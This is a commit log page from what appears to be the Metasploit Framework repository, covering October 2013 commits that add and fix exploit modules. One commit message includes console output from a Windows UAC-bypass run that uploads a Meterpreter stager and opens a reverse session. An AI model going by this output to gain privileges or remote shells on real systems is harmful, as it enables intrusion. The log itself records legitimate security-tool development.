Commit Graph

20909 Commits (5c365337424575e3f3fdb93339da6179d28472d5)

Author SHA1 Message Date
jvazquez-r7 5c36533742 Add module for the vbulletin exploit in the wild 2013-10-09 13:12:57 -05:00
William Vu 3cbea09cc6 Land #2492, s/Dyn-DNS/DynDNS/ 2013-10-09 10:54:43 -05:00
Tod Beardsley c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS) 2013-10-09 09:56:07 -05:00
jvazquez-r7 2073c4e6a7
Land #2489, @mwulftange :noquotes option for CmdStagerPrintf 2013-10-09 08:29:11 -05:00
Tod Beardsley c84e5c7443
Land #2490, new sniffer extenstion binaries 2013-10-08 17:15:54 -05:00
OJ 0a194b203d
Updated sniffer binaries
These updated binaries include a packet-sniffer fix which results in
sniffing working on x86 builds of Windows 8 and Windows 8.1.
2013-10-09 07:38:54 +10:00
sinn3r 2f0120748b
Land #2487 - Mark broken tests as pending 2013-10-08 15:10:10 -05:00
sinn3r ef48a4b385
Land #2486 - Fix error message backtrace 2013-10-08 14:55:39 -05:00
Markus Wulftange e895a17722 Add 'no quotes' option for CmdStagerPrintf
Exploit developers can use the ':noquotes => true' option to avoid
single quotes surrounding the octal escapes argument.
2013-10-08 21:04:28 +02:00
Tod Beardsley 2f670a35c4
Land #2488, ref update for ms13-080 2013-10-08 13:48:34 -05:00
sinn3r 199bd20b95 Update CVE-2013-3893's Microsoft reference
Official patch is out:
http://technet.microsoft.com/en-us/security/bulletin/MS13-080
2013-10-08 13:00:03 -05:00
Tod Beardsley 72a35d14f1
Mark broken tests as pending
These tests are broken a few different ways.

[SeeRM #8463]

also see: https://github.com/rapid7/metasploit-framework/pull/2477
2013-10-08 11:49:42 -05:00
David Maloney 7d0cf73af7 Fix multi-meter_inject error msg
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.

FIXRM #8460
2013-10-08 11:11:38 -05:00
sinn3r a5bace2425 Land #2485 - Removed extra bracket for scripts/meterpreter/vnc.rb
g0tmi1k's version was outdated, so I merged from my branch instead.
2013-10-08 10:17:49 -05:00
sinn3r db92709d33 Remove extra bracket 2013-10-08 10:17:08 -05:00
jvazquez-r7 2593c06e7c
Land #2412, @mwulftange's printf cmd stager 2013-10-08 09:08:29 -05:00
Markus Wulftange 6f7d513f6e Another clean up and simplification of CmdStagerPrintf 2013-10-08 07:22:09 +02:00
Tod Beardsley 8b9ac746db
Land #2481, deprecate linksys cmd exec module 2013-10-07 20:44:04 -05:00
sinn3r c10f0253bc Land #2472 - Clean up the way Apple Safari UXSS aux module does data collection 2013-10-07 15:47:28 -05:00
Tod Beardsley e0ce444896
Merging release back to master 2013-10-07 15:33:16 -05:00
sinn3r f7f6abc1dd Land #2479 - Add Joev to the wolfpack 2013-10-07 15:30:23 -05:00
joev 4ba001d6dd Put my short name to prevent conflicts. 2013-10-07 14:10:47 -05:00
joev ec6516d87c Deprecate misnamed module.
* Renames to a linux linksys module.
2013-10-07 14:06:13 -05:00
Tod Beardsley 61e02f3d79
Merge 'upstream-master' into release
Picks up #2480 as well.
2013-10-07 13:52:04 -05:00
jvazquez-r7 0991b72a0e
Land #2480, @todb-r7's changes for weekly update 2013-10-07 13:19:00 -05:00
Tod Beardsley 5c5cf6dc57
Merge 'upstream-master' into release
Preliminary cut for release
2013-10-07 13:15:09 -05:00
Tod Beardsley 219bef41a7
Decaps Siemens (consistent with other modules) 2013-10-07 13:12:32 -05:00
Tod Beardsley 3215453522 Empty commit to trigger a close on #2476
If this commit lands, it'll close #2476 because it accomplishes the same
thing.

[Closes #2476]
2013-10-07 12:51:34 -05:00
Tod Beardsley 4266b88a20
Move author name to just 'joev'
[See #2476]
2013-10-07 12:50:04 -05:00
Tod Beardsley ff6dec5eee
Promote joev to a first class citizen
[See #2476]
2013-10-07 12:40:43 -05:00
Tod Beardsley 293927aff0
msftidy fix for coldfusion exploit 2013-10-07 12:22:48 -05:00
joev 47e7a2de83 Kill stray debugger statement. 2013-10-06 19:32:22 -05:00
joev c2a81907ba Clean up the way Apple Safari UXSS aux module does data collection.
[FIXRM #7918]
2013-10-06 19:28:16 -05:00
jvazquez-r7 5aa3709ca2
Land #2467, @wchen-r7's code to allow dynamic size paylods on ropdb 2013-10-06 18:18:13 -05:00
sinn3r 991e82a78a Land #2470 - Continue to run UAC level is 0 2013-10-05 23:20:55 -05:00
trustedsec 0799766faa Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is:

Here is prior to the change on a fully patched Windows 8 machine:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 172.16.21.156:4444 
[*] UAC is Enabled, checking level...
[-] UAC is not enabled, no reason to run module
[-] Run exploit/windows/local/ask to elevate
msf exploit(bypassuac) > 

Here's the module when running with the most recent changes that are being proposed:

[*] Started reverse handler on 172.16.21.156:4444 
[*] UAC is Enabled, checking level...
[!] Could not determine UAC level - attempting anyways...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (770048 bytes) to 172.16.21.128
[*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400

meterpreter > 

With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
2013-10-05 15:56:55 -04:00
jvazquez-r7 875e086d94
Land #2469, @bcoles exploit for FlashChat 2013-10-05 14:51:49 -05:00
jvazquez-r7 24efb55ba9 Clean flashchat_upload_exec 2013-10-05 14:50:51 -05:00
bcoles 08243b277a Add FlashChat Arbitrary File Upload exploit module 2013-10-05 22:30:38 +09:30
Markus Wulftange 836ff24998 Clean and fix CmdStagerPrintf
Clean up of the CmdStagerPrintf as discussed in mwulftange#1
2013-10-05 10:39:55 +02:00
sinn3r a8de9d5c8b Land #2459 - Add HP LoadRunner magentproc.exe Overflow 2013-10-04 19:45:44 -05:00
Tod Beardsley f9eccae391
Land #2466, don't try to lockout SMB 2013-10-04 16:47:26 -05:00
Tod Beardsley d6c74cd0ed
Land #2463, fixes to gestoip 2013-10-04 16:43:37 -05:00
James Lee 813013fef5 Make defaults sane for the lockoutable smb_login
See #2376
2013-10-04 15:53:16 -05:00
sinn3r 77cbb7cd19 Update function documentation 2013-10-04 15:18:27 -05:00
jvazquez-r7 113f89e40f First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00
jvazquez-r7 299dfe73f1
Land #2460, @xistence's exploit for clipbucket 2013-10-04 12:26:30 -05:00
jvazquez-r7 8e0a4e08a2 Fix author order 2013-10-04 12:25:38 -05:00
Tod Beardsley ff72f0af62
Land #2461, GestioIP module 2013-10-04 11:07:08 -05:00
Tod Beardsley 9b79bb99e0 Add references, correct disclosure date 2013-10-04 09:59:26 -05:00